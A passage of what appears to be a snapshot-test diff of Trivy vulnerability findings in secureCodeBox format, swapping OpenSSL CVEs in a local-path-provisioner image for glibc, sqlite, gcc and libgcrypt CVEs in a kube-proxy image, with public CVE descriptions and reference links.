"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", ], }, "category": "Vulnerability", - "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3450", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3450", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", + ], + }, + "category": "Vulnerability", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3450", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-08", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.5", + "packageName": "libdb5.3", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", + }, + { + "type": "URL", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + }, + { + "type": "URL", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "value": "https://usn.ubuntu.com/4019-1/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", + ], + }, + "category": "Vulnerability", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - "https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + 